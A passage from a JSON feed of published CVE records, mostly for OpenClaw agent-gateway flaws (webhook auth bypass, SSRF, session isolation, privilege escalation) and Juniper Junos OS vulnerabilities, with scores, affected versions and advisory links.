access.","cvss":5.1,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":5.1,"cvss_v4":5.1,"epss":0.00024,"ranking_epss":0.06577,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87","https://github.com/openclaw/openclaw/commit/d5dc6b6573ae489bc7e5651090f4767b93537c9e","https://github.com/openclaw/openclaw/security/advisories/GHSA-6mqc-jqh6-x8fc","https://www.vulncheck.com/advisories/openclaw-authentication-bypass-via-local-direct-requests-in-canvas-gateway"],"published_time":"2026-04-09T22:16:32","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-35635","summary":"OpenClaw before 2026.3.22 contains a webhook path route replacement vulnerability in the Synology Chat extension that allows attackers to collapse multi-account configurations onto shared webhook paths. Attackers can exploit inherited or duplicate webhook paths to bypass per-account DM access control policies and replace route ownership across accounts.","cvss":6.3,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":4.8,"cvss_v4":6.3,"epss":0.00029,"ranking_epss":0.08118,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87","https://github.com/openclaw/openclaw/commit/980940aa58f862da4e19372597bbc2a9f268d70b","https://github.com/openclaw/openclaw/security/advisories/GHSA-rqp8-q22p-5j9q","https://www.vulncheck.com/advisories/openclaw-webhook-path-route-replacement-vulnerability-in-synology-chat"],"published_time":"2026-04-09T22:16:32","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-35636","summary":"OpenClaw versions 2026.3.11 through 2026.3.24 contain a session isolation bypass vulnerability where session_status resolves sessionId to canonical session keys before enforcing visibility checks. Sandboxed child sessions can exploit this to access parent or sibling sessions that should be blocked by explicit sessionKey restrictions.","cvss":7.1,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":6.5,"cvss_v4":7.1,"epss":0.00029,"ranking_epss":0.08109,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/openclaw/openclaw/commit/d9810811b6c3c9266d7580f00574e5e02f7663de","https://github.com/openclaw/openclaw/security/advisories/GHSA-q2qc-744p-66r2","https://www.vulncheck.com/advisories/openclaw-session-isolation-bypass-via-sessionid-resolution"],"published_time":"2026-04-09T22:16:32","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-35637","summary":"OpenClaw before 2026.3.22 performs cite expansion before completing channel and DM authorization checks, allowing cite work and content handling prior to final auth decisions. Attackers can exploit this timing vulnerability to access or manipulate content before proper authorization validation occurs.","cvss":6.9,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":7.3,"cvss_v4":6.9,"epss":0.00042,"ranking_epss":0.12573,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/openclaw/openclaw/commit/3cbf932413e41d1836cb91aed1541a28a3122f93","https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87","https://github.com/openclaw/openclaw/commit/ebee4e2210e1f282a982c7ef2ad79d77a572fc87","https://github.com/openclaw/openclaw/security/advisories/GHSA-vfg3-pqpq-93m4","https://www.vulncheck.com/advisories/openclaw-premature-cite-expansion-before-authorization-in-channel-and-dm"],"published_time":"2026-04-09T22:16:32","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-35626","summary":"OpenClaw before 2026.3.22 contains an unauthenticated resource exhaustion vulnerability in voice call webhook handling that buffers request bodies before provider signature checks. Attackers can send large or malicious webhook requests to exhaust server resources without authentication by bypassing signature validation.","cvss":6.9,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":5.3,"cvss_v4":6.9,"epss":0.00065,"ranking_epss":0.20155,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87","https://github.com/openclaw/openclaw/commit/651dc7450b68a5396a009db78ef9382633707ead","https://github.com/openclaw/openclaw/security/advisories/GHSA-rm59-992w-x2mv","https://www.vulncheck.com/advisories/openclaw-unauthenticated-resource-exhaustion-via-voice-call-webhook"],"published_time":"2026-04-09T22:16:31","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-35627","summary":"OpenClaw before 2026.3.22 performs cryptographic and dispatch operations on inbound Nostr direct messages before enforcing sender and pairing policy validation. Attackers can trigger unauthorized pre-authentication computation by sending crafted DM messages, enabling denial of service through resource exhaustion.","cvss":6.9,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":6.5,"cvss_v4":6.9,"epss":0.00082,"ranking_epss":0.24048,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/openclaw/openclaw/commit/1ee9611079e81b9122f4bed01abb3d9f56206c77","https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87","https://github.com/openclaw/openclaw/security/advisories/GHSA-65h8-27jh-q8wv","https://www.vulncheck.com/advisories/openclaw-unauthenticated-cryptographic-work-in-nostr-inbound-dm-handling"],"published_time":"2026-04-09T22:16:31","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-35628","summary":"OpenClaw before 2026.3.25 contains a missing rate limiting vulnerability in Telegram webhook authentication that allows attackers to brute-force weak webhook secrets. The vulnerability enables repeated authentication guesses without throttling, permitting attackers to systematically guess webhook secrets through brute-force attacks.","cvss":6.3,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":4.8,"cvss_v4":6.3,"epss":0.00038,"ranking_epss":0.11148,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/openclaw/openclaw/commit/c2c136ae9517ddd0789d742a0fdf4c10e8c729a7","https://github.com/openclaw/openclaw/security/advisories/GHSA-vcx4-4qxg-mfp4","https://www.vulncheck.com/advisories/openclaw-brute-force-attack-via-missing-telegram-webhook-rate-limiting"],"published_time":"2026-04-09T22:16:31","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-35629","summary":"OpenClaw before 2026.3.25 contains a server-side request forgery vulnerability in multiple channel extensions that fail to properly guard configured base URLs against SSRF attacks. Attackers can exploit unprotected fetch() calls against configured endpoints to rebind requests to blocked internal destinations and access restricted resources.","cvss":5.3,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":7.4,"cvss_v4":5.3,"epss":0.00034,"ranking_epss":0.09636,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/openclaw/openclaw/commit/f92c92515bd439a71bd03eb1bc969c1964f17acf","https://github.com/openclaw/openclaw/security/advisories/GHSA-rhfg-j8jq-7v2h","https://www.vulncheck.com/advisories/openclaw-server-side-request-forgery-via-unguarded-configured-base-urls-in-channel-extensions"],"published_time":"2026-04-09T22:16:31","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-35631","summary":"OpenClaw before 2026.3.22 fails to enforce operator.admin scope on mutating internal ACP chat commands, allowing unauthorized modifications. Attackers without admin privileges can execute mutating control-plane actions by directly invoking affected ACP commands to bypass authorization gates.","cvss":7.1,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":6.5,"cvss_v4":7.1,"epss":0.00026,"ranking_epss":0.07341,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/openclaw/openclaw/commit/229426a257e49694a59fa4e3895861d02a4d767f","https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87","https://github.com/openclaw/openclaw/security/advisories/GHSA-3w6x-gv34-mqpf","https://www.vulncheck.com/advisories/openclaw-missing-authorization-enforcement-in-internal-acp-chat-commands"],"published_time":"2026-04-09T22:16:31","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-35618","summary":"OpenClaw before 2026.3.23 contains a replay identity vulnerability in Plivo V2 signature verification that allows attackers to bypass replay protection by modifying query parameters. The verification path derives replay keys from the full URL including query strings instead of the canonicalized base URL, enabling attackers to mint new verified request keys through unsigned query-only changes to signed requests.","cvss":8.3,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":6.5,"cvss_v4":8.3,"epss":0.00028,"ranking_epss":0.07893,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87","https://github.com/openclaw/openclaw/commit/b0ce53a79cf63834660270513e26d921899b4e5b","https://github.com/openclaw/openclaw/security/advisories/GHSA-cg6c-q2hx-69h7","https://www.vulncheck.com/advisories/openclaw-replay-identity-drift-via-query-only-variants-in-plivo-v2-verification"],"published_time":"2026-04-09T22:16:30","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-35622","summary":"OpenClaw before 2026.3.22 contains an improper authentication verification vulnerability in Google Chat app-url webhook handling that accepts add-on principals outside intended deployment bindings. Attackers can bypass webhook authentication by providing non-deployment add-on principals to execute unauthorized actions through the Google Chat integration.","cvss":6.0,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":5.9,"cvss_v4":6.0,"epss":0.00044,"ranking_epss":0.13199,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87","https://github.com/openclaw/openclaw/commit/a47722de7e3c9cbda8d5512747ca7e3bb8f6ee66","https://github.com/openclaw/openclaw/security/advisories/GHSA-mp66-rf4f-mhh8","https://www.vulncheck.com/advisories/openclaw-improper-authentication-verification-in-google-chat-webhook"],"published_time":"2026-04-09T22:16:30","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-35623","summary":"OpenClaw before 2026.3.25 contains a missing rate limiting vulnerability in webhook authentication that allows attackers to brute-force weak webhook passwords without throttling. Remote attackers can repeatedly submit incorrect password guesses to the webhook endpoint to compromise authentication and gain unauthorized access.","cvss":6.3,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":4.8,"cvss_v4":6.3,"epss":0.00047,"ranking_epss":0.14463,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/openclaw/openclaw/commit/5e08ce36d522a1c96df2bfe88e39303ae2643d92","https://github.com/openclaw/openclaw/security/advisories/GHSA-xq8g-hgh6-87hv","https://www.vulncheck.com/advisories/openclaw-brute-force-attack-via-missing-webhook-password-rate-limiting"],"published_time":"2026-04-09T22:16:30","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-35624","summary":"OpenClaw before 2026.3.22 contains a policy confusion vulnerability in room authorization that matches colliding room names instead of stable room tokens. Attackers can exploit similarly named rooms to bypass allowlist policies and gain unauthorized access to protected Nextcloud Talk rooms.","cvss":2.3,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":4.2,"cvss_v4":2.3,"epss":0.0005,"ranking_epss":0.15522,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87","https://github.com/openclaw/openclaw/commit/a47722de7e3c9cbda8d5512747ca7e3bb8f6ee66","https://github.com/openclaw/openclaw/security/advisories/GHSA-xhq5-45pm-2gjr","https://www.vulncheck.com/advisories/openclaw-policy-confusion-via-room-name-collision-in-nextcloud-talk"],"published_time":"2026-04-09T22:16:30","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-35625","summary":"OpenClaw before 2026.3.25 contains a privilege escalation vulnerability where silent local shared-auth reconnects auto-approve scope-upgrade requests, widening paired device permissions from operator.read to operator.admin. Attackers can exploit this by triggering local reconnection to silently escalate privileges and achieve remote code execution on the node.","cvss":8.5,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":7.8,"cvss_v4":8.5,"epss":0.00033,"ranking_epss":0.09335,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/openclaw/openclaw/commit/81ebc7e0344fd19c85778e883bad45e2da972229","https://github.com/openclaw/openclaw/security/advisories/GHSA-fqw4-mph7-2vr8","https://www.vulncheck.com/advisories/openclaw-privilege-escalation-via-silent-local-shared-auth-reconnect"],"published_time":"2026-04-09T22:16:30","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-33791","summary":"An OS Command Injection vulnerability in the CLI processing of Juniper Networks Junos OS and Junos OS Evolved allows a local, high-privileged attacker executing specific, crafted CLI commands to inject arbitrary shell commands as root, leading to a complete compromise of the system.\n\nCertain 'set system' commands, when executed with crafted arguments, are not properly sanitized, allowing for arbitrary shell injection. These shell commands are executed as root, potentially allowing for complete control of the vulnerable system.\nThis issue affects:\n\nJunos OS: \n\n\n\n  *  all versions before 22.4R3-S8, \n  *  from 23.2 before 23.2R2-S5, \n  *  from 23.4 before 23.4R2-S7, \n  *  from 24.2 before 24.2R2-S2, \n  *  from 24.4 before 24.4R2, \n  *  from 25.2 before 25.2R2; \n\n\n\n\nJunos OS Evolved: \n\n\n\n  *  all versions before 22.4R3-S8-EVO, \n  *  from 23.2 before 23.2R2-S5-EVO, \n  *  from 23.4 before 23.4R2-S7-EVO, \n  *  from 24.2 before 24.2R2-S2-EVO, \n  *  from 24.4 before 24.4R2-EVO, \n  *  from 25.2 before 25.2R1-S1-EVO, 25.2R2-EVO.","cvss":8.4,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":6.7,"cvss_v4":8.4,"epss":0.00041,"ranking_epss":0.12443,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://kb.juniper.net/JSA107875"],"published_time":"2026-04-09T22:16:29","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-33793","summary":"An Execution with Unnecessary Privileges vulnerability in the User Interface (UI) of Juniper Networks Junos OS and Junos OS Evolved allows a local, low-privileged attacker to gain root privileges, thus compromising the system.\n\nWhen a configuration that allows unsigned Python op scripts is present on the device, a non-root user is able to execute malicious op scripts as a root-equivalent user, leading to privilege escalation. \n\nThis issue affects Junos OS: \n\n  *  All versions before 22.4R3-S7, \n  *  from 23.2 before 23.2R2-S4, \n  *  from 23.4 before 23.4R2-S6,\n  *  from 24.2 before 24.2R1-S2, 24.2R2, \n  *  from 24.4 before 24.4R1-S2, 24.4R2; \n\n\n\n\nJunos OS Evolved: \n\n\n\n  *  All versions before 22.4R3-S7-EVO, \n  *  from 23.2 before 23.2R2-S4-EVO, \n  *  from 23.4 before 23.4R2-S6-EVO,\n  *  from 24.2 before 24.2R2-EVO, \n  *  from 24.4 before 24.4R1-S1-EVO, 24.4R2-EVO.","cvss":8.5,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":7.8,"cvss_v4":8.5,"epss":0.00014,"ranking_epss":0.0235,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://kb.juniper.net/JSA103142"],"published_time":"2026-04-09T22:16:29","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-33797","summary":"An Improper Input Validation vulnerability in Juniper Networks Junos OS and Junos OS Evolved allows an unauthenticated, adjacent attacker, sending a specific genuine BGP packet in an already established BGP session to reset only that session causing a Denial of Service (DoS).\n\nAn attacker repeatedly sending the packet will sustain the Denial of Service (DoS).This issue affects Junos OS:\n\n  *  25.2 versions before 25.2R2\n\n\nThis issue doesn't not affected Junos OS versions before 25.2R1.\n\nThis issue affects Junos OS Evolved: \n  *  25.2-EVO versions before 25.2R2-EVO\n\n\nThis issue doesn't not affected Junos OS Evolved versions before 25.2R1-EVO.\n\neBGP and iBGP are affected.\nIPv4 and IPv6 are affected.","cvss":7.1,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":7.4,"cvss_v4":7.1,"epss":0.00022,"ranking_epss":0.05889,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://kb.juniper.net/JSA107850"],"published_time":"2026-04-09T22:16:29","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-34512","summary":"OpenClaw before 2026.3.25 contains an improper access control vulnerability in the HTTP /sessions/:sessionKey/kill route that allows any bearer-authenticated user to invoke admin-level session termination functions without proper scope validation. Attackers can exploit this by sending authenticated requests to kill arbitrary subagent sessions via the killSubagentRunAdmin function, bypassing ownership and operator scope restrictions.","cvss":7.2,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":8.1,"cvss_v4":7.2,"epss":0.00034,"ranking_epss":0.1004,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/openclaw/openclaw/commit/02cf12371f9353a16455da01cc02e6c4ecfc4152","https://github.com/openclaw/openclaw/security/advisories/GHSA-9p93-7j67-5pc2","https://www.vulncheck.com/advisories/openclaw-improper-access-control-in-sessions-sessionkey-kill-endpoint"],"published_time":"2026-04-09T22:16:29","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-35617","summary":"OpenClaw before 2026.3.25 contains an authorization bypass vulnerability in Google Chat group policy enforcement that relies on mutable space display names. Attackers can rebind group policies by changing or colliding space display names to gain unauthorized access to protected resources.","cvss":2.3,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":4.2,"cvss_v4":2.3,"epss":0.00048,"ranking_epss":0.14539,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/openclaw/openclaw/commit/11ea1f67863d88b6cbcb229dd368a45e07094bff","https://github.com/openclaw/openclaw/security/advisories/GHSA-52q4-3xjc-6778","https://www.vulncheck.com/advisories/openclaw-authorization-bypass-via-group-policy-rebinding-with-mutable-space-displayname"],"published_time":"2026-04-09T22:16:29","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-33786","summary":"An Improper Check for Unusual or Exceptional Conditions vulnerability in the chassis control daemon (chassisd) of Juniper Networks Junos OS on SRX1600, SRX2300 and SRX4300 allows a local attacker with low privileges to cause a complete Denial of Service (DoS).\n\nWhen a specific 'show chassis' CLI command is executed, chassisd crashes and restarts which causes a momentary impact to all traffic until all modules are online again.\n\nThis issue affects Junos OS on SRX1600, SRX2300 and SRX4300:\n\n\n\n  *  24.4 versions before 24.4R1-S3, 24.4R2.\n\n\nThis issue does not affect Junos OS versions before 24.4R1.","cvss":6.8,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":5.5,"cvss_v4":6.8,"epss":0.00013,"ranking_epss":0.0202,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://kb.juniper.net/JSA107810"],"published_time":"2026-04-09T22:16:28","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-33787","summary":"An Improper Check for Unusual or Exceptional Conditions vulnerability in the chassis control daemon (chassisd) of Juniper Networks Junos OS on SRX1500, SRX4100, SRX4200 and SRX4600 allows a local attacker with low privileges to cause a complete Denial of Service (DoS).\n\nWhen a specific 'show chassis' CLI command is executed, chassisd crashes and restarts which causes a momentary impact to all traffic until all modules are online again.\n\n\n\nThis issue affects Junos OS on SRX1500, SRX4100, SRX4200 and SRX4600: \n\n\n\n  *  23.2 versions before 23.2R2-S6,\n  *  23.4 versions before 23.4R2-S7\n  *  24.2 versions before 24.2R2-S2,\n  *  24.4 versions before 24.4R2,\n  *  25.2 versions before 25.2R1-S1, 25.2R2.","cvss":6.8,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":5.5,"cvss_v4":6.8,"epss":0.00013,"ranking_epss":0.0202,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://kb.juniper.net/JSA107873"],"published_time":"2026-04-09T22:16:28","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-33788","summary":"A Missing Authentication for Critical Function vulnerability in the Flexible PIC Concentrators (FPCs) of Juniper Networks Junos OS Evolved on PTX Series allows a local, authenticated attacker with low privileges to gain direct access to FPCs installed in the device.\n\nA local user with low privileges can gain direct access to the installed FPCs as a high privileged user, which can potentially lead to a full compromise of the affected component.\n\nThis issue affects Junos OS Evolved on PTX10004, PTX10008, PTX100016, with JNP10K-LC1201 or JNP10K-LC1202:\n\n\n\n\n  *  All versions before 21.2R3-S8-EVO,\n  *  21.4-EVO versions before 21.4R3-S7-EVO,\n  *  22.2-EVO versions before 22.2R3-S4-EVO,\n  *  22.3-EVO versions before 22.3R3-S3-EVO,\n  *  22.4-EVO versions before 22.4R3-S2-EVO,\n  *  23.2-EVO versions before 23.2R2-EVO.","cvss":8.5,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":7.8,"cvss_v4":8.5,"epss":0.00016,"ranking_epss":0.03363,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://kb.juniper.net/JSA107806"],"published_time":"2026-04-09T22:16:28","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-33790","summary":"An Improper Check for Unusual or Exceptional Conditions vulnerability in the flow daemon (flowd) of Juniper Networks Junos OS on SRX Series allows an attacker sending a specific, malformed ICMPv6 packet to cause the srxpfe process to crash and restart. Continued receipt and processing of these packets will repeatedly crash the srxpfe process and sustain the Denial of Service (DoS) condition.\n\nDuring NAT64 translation, receipt of a specific, malformed ICMPv6 packet destined to the device will cause the srxpfe process to crash and restart.\n\nThis issue cannot be triggered using IPv4 nor other IPv6 traffic.\n\n\n\nThis issue affects Junos OS on SRX Series:\n  *  all versions before 21.2R3-S10,\n  *  all versions of 21.3,\n  *  from 21.4 before 21.4R3-S12,\n  *  all versions of 22.1,\n  *  from 22.2 before 22.2R3-S8,\n  *  all versions of 22.4,\n  *  from 22.4 before 22.4R3-S9,\n  *  from 23.2 before 23.2R2-S6,\n  *  from 23.4 before 23.4R2-S7,\n  *  from 24.2 before 24.2R2-S3,\n  *  from 24.4 before 24.4R2-S3,\n  *  from 25.2 before 25.2R1-S2, 25.2R2.","cvss":8.7,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":7.5,"cvss_v4":8.7,"epss":0.0004,"ranking_epss":0.1194,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://kb.juniper.net/JSA107874"],"published_time":"2026-04-09T22:16:28","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-33781","summary":"An Improper Check for Unusual or Exceptional Conditions vulnerability in the packet forwarding engine (pfe) of Juniper Networks Junos OS on specific EX and QFX Series devices allow an unauthenticated, adjacent attacker to cause a complete Denial of Service (DoS).\n\nOn EX4k, and QFX5k platforms configured as service-provider edge devices, if L2PT is enabled on the UNI and VSTP is enabled on NNI in VXLAN scenarios, receiving VSTP BPDUs on UNI leads to packet buffer allocation failures, resulting in the device to not pass traffic anymore until it is manually recovered with a restart.This issue affects Junos OS:\n\n\n\n  *  24.4 releases before 24.4R2,\n  *  25.2 releases before 25.2R1-S1, 25.2R2.\n\n\n\n\nThis issue does not affect Junos OS releases before 24.4R1.","cvss":7.1,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":6.5,"cvss_v4":7.1,"epss":0.00016,"ranking_epss":0.03297,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://kb.juniper.net/JSA107869"],"published_time":"2026-04-09T22:16:27","vendor":null,"product":null,"version":null}]}